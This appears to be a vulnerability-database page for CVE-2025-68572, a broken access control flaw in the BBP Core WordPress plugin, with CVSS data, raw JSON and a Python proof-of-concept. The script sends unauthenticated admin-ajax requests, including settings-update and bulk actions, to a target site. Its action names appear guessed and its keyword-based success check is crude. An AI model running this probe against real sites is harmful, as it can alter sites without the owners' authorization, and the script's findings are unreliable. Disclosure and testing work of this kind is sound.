Security Vulnerability Report
中文
CVE-2025-68572 CVSS 5.3 MEDIUM

CVE-2025-68572

Published: 2025-12-24 13:16:24
Last Modified: 2026-04-27 19:16:32

Description

Missing Authorization vulnerability in Spider Themes BBP Core bbp-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BBP Core: from n/a through <= 1.4.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BBP Core插件 <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68572 BBP Core Authorization Bypass PoC # Target: WordPress sites with BBP Core plugin <= 1.4.1 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-68572 Tests for missing authorization in BBP Core plugin """ # Test endpoint 1: Unprotected admin function endpoint1 = f"{target_url}/wp-admin/admin-ajax.php" # Common BBP Core vulnerable actions vulnerable_actions = [ "bbp_core_get_stats", "bbp_core_update_settings", "bbp_core_manage_forums", "bbp_core_bulk_actions" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68572 - BBP Core Authorization Bypass\n") for action in vulnerable_actions: try: # Send unauthenticated request data = { "action": action, "_wpnonce": "" # Empty nonce to test bypass } response = requests.post(endpoint1, data=data, timeout=10) # Check for successful unauthorized access indicators if response.status_code == 200: # Check response for sensitive data exposure response_text = response.text.lower() if any(indicator in response_text for indicator in [ "success", "user", "admin", "stats", "count" ]): print(f"[!] VULNERABLE: Action '{action}' accessible without auth") print(f" Response preview: {response.text[:200]}...") return True except Exception as e: print(f"[-] Error testing {action}: {e}") print("[*] Target may not be vulnerable or plugin not installed") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68572", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.183", "lastModified": "2026-04-27T19:16:31.867", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Spider Themes BBP Core bbp-core allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BBP Core: from n/a through <= 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bbp-core/vulnerability/wordpress-bbp-core-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}